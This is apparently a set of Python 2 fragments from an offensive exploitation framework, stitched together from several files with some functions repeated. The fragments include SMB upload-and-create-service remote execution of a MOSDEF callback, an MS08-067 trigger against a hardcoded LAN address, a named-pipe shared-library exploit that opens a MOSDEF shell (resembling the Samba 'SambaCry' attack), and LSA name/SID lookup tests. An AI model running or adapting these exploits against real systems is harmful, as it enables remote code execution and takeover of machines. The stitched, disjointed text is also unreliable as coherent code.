def __bind_ntlm(self, connector):
try:
self.dce = DCERPC(connector,
getsock=None,
username=self.username,
password=self.password,
domain=self.domain)
return self.dce.bind(self.uuid[0], self.uuid[1])
except Exception as e:
return 0
def exec_native_callback(self):
logging.info("Uploading and executing a privileged MOSDEF callback")
# Upload our callback
f = file(self.local_callback, 'r')
self.client.put(f, self.remote_callback)
f.close()
# Upload our service
if self.is_64bit:
f = file(self.local_service_64, 'r')
else:
f = file(self.local_service_32, 'r')
self.client.put(f, self.remote_service)
f.close()
# Setup dcerpc/svcctl in order to reuse our upgraded SMB connection
binding = u'ncacn_np:%s[\\svcctl]' % self.host
dce = DCERPC(binding, getsock=None, smb_client=self.client)
svc = svcctl.SVCCTLClient(self.host, dce=dce)
svc.dce.bind(svc.uuid[0], svc.uuid[1])
# Create service
try:
handle = svc.open_manager()
svc.create_service(handle=handle,
service_name=self.service_name,
binary_pathname=self.remote_service,
display_name=self.service_name,
start_type=svcctl.SVCCTL_SERVICE_AUTO_START)
except svcctl.SVCCTLCreateServiceException as e:
logging.error('Error while creating service (%s)' % str(e))
return False
else:
logging.info("Service has been created successfully (%s)" %
self.service_name)
try:
service_handle = svc.open_service(self.service_name)
except svcctl.SVCCTLCreateServiceException as e:
logging.critical('svc.open_service() failed (%s)' % str(e))
return False
# Start service
try:
svc.start_service(service_handle, args=[self.remote_callback])
except svcctl.SVCCTLCreateServiceException as e:
logging.critical("Service could not be started (%s)" % str(e))
return False
# Close everything
svc.close_service(service_handle)
svc.close_manager()
return True
def detect_arch(self):
binding = "ncacn_ip_tcp:%s[135]" % self.host
dce = DCERPC(binding, getsock=None)
try:
r = dce.bind('e1af8308-5d1f-11c9-91a4-08002b14a0fa',
'3.0',
t_uuid='71710533-beba-4937-8319-b5dbef9ccc36',
t_ver='1.0')
except DCERPCException, e:
logging.error(
"Error while detecting target architecture, assuming 64bit")
return
def __bind_ntlm(self, connector):
try:
self.dce = DCERPC(connector,
getsock=None,
username=self.username,
password=self.password,
domain=self.domain)
return self.dce.bind(self.uuid[0], self.uuid[1], RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
except Exception as e:
return 0
def __bind_krb5(self, connector):
try:
self.dce = DCERPC(connector,
getsock=None,
username=self.username,
password=self.password,
domain=self.domain,
kerberos_db=self.kerberos_db,
use_krb5=True)
return self.dce.bind(self.uuid[0], self.uuid[1])
except Exception as e:
return 0
def cleanup_native(self):
# Setup dcerpc/svcctl in order to reuse our upgraded SMB connection
binding = u'ncacn_np:%s[\\svcctl]' % self.host
dce = DCERPC(binding, getsock=None, smb_client=self.client)
svc = svcctl.SVCCTLClient(self.host, dce=dce)
svc.dce.bind(svc.uuid[0], svc.uuid[1])
logging.info("Stopping service (%s)" % self.service_name)
try:
service_handle = svc.open_service(self.service_name)
svc.stop_service(service_handle)
# We allow up to 5s for the service to stop
logging.info("Sleeping for %ds" % self.timeout)
for i in range(0, self.timeout):
ret = svc.query_service(service_handle)
if ret['CurrentState'] == svcctl.SVCCTL_SERVICE_STOPPED:
break
time.sleep(1)
except Exception as e:
logging.error("Failed to stop service (%s)" % str(e))
else:
logging.info("Service has been stopped successfully")
logging.info("Deleting service (%s)" % self.service_name)
try:
service_handle = svc.delete_service(service_name=self.service_name)
svc.close_service(service_handle)
except Exception as e:
logging.critical("Error while deleting service (%s)" % str(e))
return False
else:
logging.info("Service (%s) has been deleted successfully" %
self.service_name)
return True
import sys
from struct import pack
if '.' not in sys.path:
sys.path.append('.')
from libs.newsmb.libdcerpc import DCERPC, DCERPCString
print '***** Testing Windows 2000 Trigger for MS08-067 *****'
path = u'A\\..\\..\\'.encode('UTF-16LE')
mark = len(path)
path += u'\0'.encode('UTF-16LE')
data =''
data += pack('<L', 1)
data += DCERPCString(string = u'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'.encode('UTF-16LE')).pack()
data += '\0\0'
data += DCERPCString(string = path).pack()
data += '\0\0'
data += pack('<L', 2)
data += DCERPCString(string = u'\\'.encode('UTF-16LE')).pack()
data += pack('<LL', 1, 1)
dce = DCERPC(u'ncacn_np:192.168.2.107[\\browser]', getsock=None)
#dce.max_dcefrag = 100
dce.bind(u'4b324fc8-1670-01d3-1278-5a47bf6ee188', u'3.0') #, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.call(0x1f, data, response=True)
print dce.reassembled_data.encode('hex')
def exploit(self, arch):
self.exename = '__exe%d.a' % random.randint(1, 1000000)
logging.info("Uploading self.payload: %r" % self.exename)
stream = StringIO.StringIO()
stream.write(self.payload)
self.smbobj.put(stream, self.exename)
if arch == 'x86':
lib = file('%s/7494libi686.so' % self.resourcePath, 'rb').read()
else:
lib = file('%s/7494libx86_64.so' % self.resourcePath, 'rb').read()
offset = lib.find(pack('<L', 0xdeadbeef))
exepath = self.basepath + self.exename
lib = lib[0:offset] + exepath + lib[offset + len(exepath):]
stream = StringIO.StringIO()
stream.write(lib)
logging.info("Uploading payload: __namedpipe.so")
self.smbobj.put(stream, '__namedpipe.so')
logging.info("Binding to named pipe: %s[\\pipe%s]" %
(self.host, self.path))
connector = u'ncacn_np:%s[\\pipe%s]' % (self.host, self.path)
if self.use_kerberos:
dce = DCERPC(connector,
getsock=None,
username=self.user,
password=self.password,
domain=self.domain,
kerberos_db=self.ccache_file,
use_krb5=True)
else:
dce = DCERPC(connector,
getsock=None,
username=self.user,
password=self.password,
domain=self.domain)
dce.dcerpc_connection.connect()
sck = dce.dcerpc_connection.s
time.sleep(.1)
logging.info("Cleaning up uploaded files")
self.smbobj.delete('__namedpipe.so')
self.smbobj.delete(self.exename)
logging.info("Calling recv on smb socket")
try:
buf = sck.recv(1000)
except:
return None
node = None
if buf.find("G") != -1:
logging.info("Got response")
sck.send("O")
node = linuxNode()
node.parentnode = self.socknode
linuxMosdefShellServer.linuxshellserver(
sck, node, logfunction=self.logfunction)
logging.info("Calling startup for MOSDEF shell server")
node.startup()
self.setInfo("%s attacking %s:%d (succeeded)" %
(NAME, self.host, self.port))
return node
def do_test():
dce = DCERPC(u'ncacn_np:%s[\\lsarpc]' % HOST, getsock=None)
dce.max_dcefrag = 100
dce.bind(u'12345778-1234-abcd-ef00-0123456789ab', u'0.0',
RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
# 1. Open
data = lsa.LSAOpenPolicy2Request(
SystemName='\\\\%s' % HOST,
DesiredAccess=lsa.LSA_POLICY_LOOKUP_NAMES).pack()
dce.call(lsa.LSA_COM_OPEN_POLICY2, data, response=True)
policy_handle = lsa.LSAOpenPolicy2Response(
dce.reassembled_data).get_handle()
# 2. Perform a lookup with valid names
data = lsa.LSALookupNames3Request(PolicyHandle=policy_handle,
NamesArray=USERS).pack()
dce.call(lsa.LSA_COM_LOOKUP_NAMES3, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status == 0:
resp = lsa.LSALookupNames3Response(dce.reassembled_data)
domains = resp.get_domains()
sids = resp.get_sids()
print sids
sids2 = [sid['Sid'] for sid in sids]
if sids2 != SIDS:
return False
else:
return False
# 3. Perform a lookup with invalid names
data = lsa.LSALookupNames3Request(PolicyHandle=policy_handle,
NamesArray=USERS + ['notvalid']).pack()
dce.call(lsa.LSA_COM_LOOKUP_NAMES3, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status != 0x107: # STATUS_SOME_NOT_MAPPED
return False
# 4. Perform a lookup with valid Sids
data = lsa.LSALookupSidsRequest(PolicyHandle=policy_handle,
Sids=SIDS).pack()
data = dce.call(lsa.LSA_COM_LOOKUP_SIDS, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status == 0:
resp = lsa.LSALookupSidsResponse(dce.reassembled_data)
domains = resp.get_domains()
names = resp.get_names()
else:
return False
# 5. Perform a lookup with invalid Sids
data = lsa.LSALookupSidsRequest(PolicyHandle=policy_handle,
Sids=SIDS + ['S-1-1337']).pack()
data = dce.call(lsa.LSA_COM_LOOKUP_SIDS, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status != 0x107: # STATUS_SOME_NOT_MAPPED
return False
# 6. Destroy the handle
data = lsa.LSACloseRequest(PolicyHandle=policy_handle).pack()
dce.call(lsa.LSA_COM_CLOSE, data, response=True)
ret = lsa.LSACloseResponse(dce.reassembled_data).get_return_value()
if ret:
return False
# Good :)
return True
def do_test():
dce = DCERPC(u'ncacn_np:%s[\\lsarpc]' % HOST,
getsock=None,
username=USERNAME,
password=PASSWORD)
dce.max_dcefrag = 100
dce.bind(u'12345778-1234-abcd-ef00-0123456789ab', u'0.0',
RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
# 1. Open
data = lsa.LSAOpenPolicy2Request(
SystemName='\\\\%s' % HOST,
DesiredAccess=lsa.LSA_POLICY_LOOKUP_NAMES).pack()
dce.call(lsa.LSA_COM_OPEN_POLICY2, data, response=True)
policy_handle = lsa.LSAOpenPolicy2Response(
dce.reassembled_data).get_handle()
# 2. Perform a lookup with valid names
data = lsa.LSALookupNames3Request(PolicyHandle=policy_handle,
NamesArray=USERS).pack()
dce.call(lsa.LSA_COM_LOOKUP_NAMES3, data, response=True)
answer = dce.reassembled_data[:-4]
if not answer or len(answer) < 4:
logging.error(
'[-] Failure! lsa.LSALookupNames3Request() did not return an answer.'
)
return False
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status == 0:
resp = lsa.LSALookupNames3Response(dce.reassembled_data)
domains = resp.get_domains()
sids = resp.get_sids()
logging.info(sids)
SIDS = [sid['Sid'] for sid in sids]
for s in SIDS:
rid = int(s.split('-')[-1])
if rid != 500 and (rid < 1100 or rid > 1200):
return False
else:
return False
# 3. Perform a lookup with invalid names
data = lsa.LSALookupNames3Request(PolicyHandle=policy_handle,
NamesArray=USERS + ['notvalid']).pack()
dce.call(lsa.LSA_COM_LOOKUP_NAMES3, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status != 0x107: # STATUS_SOME_NOT_MAPPED
return False
# 4. Perform a lookup with valid Sids
data = lsa.LSALookupSidsRequest(PolicyHandle=policy_handle,
Sids=SIDS).pack()
data = dce.call(lsa.LSA_COM_LOOKUP_SIDS, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status == 0:
resp = lsa.LSALookupSidsResponse(dce.reassembled_data)
domains = resp.get_domains()
names = resp.get_names()
else:
return False
# 5. Perform a lookup with invalid Sids
data = lsa.LSALookupSidsRequest(PolicyHandle=policy_handle,
Sids=SIDS + ['S-1-1337']).pack()
data = dce.call(lsa.LSA_COM_LOOKUP_SIDS, data, response=True)
answer = dce.reassembled_data[:-4]
status = unpack('<L', dce.reassembled_data[-4:])[0]
if status != 0xc0000078: # STATUS_INVALID_SID
return False
# 6. Destroy the handle
data = lsa.LSACloseRequest(PolicyHandle=policy_handle).pack()
dce.call(lsa.LSA_COM_CLOSE, data, response=True)
ret = lsa.LSACloseResponse(dce.reassembled_data).get_return_value()
if ret:
return False
# Good :)
return True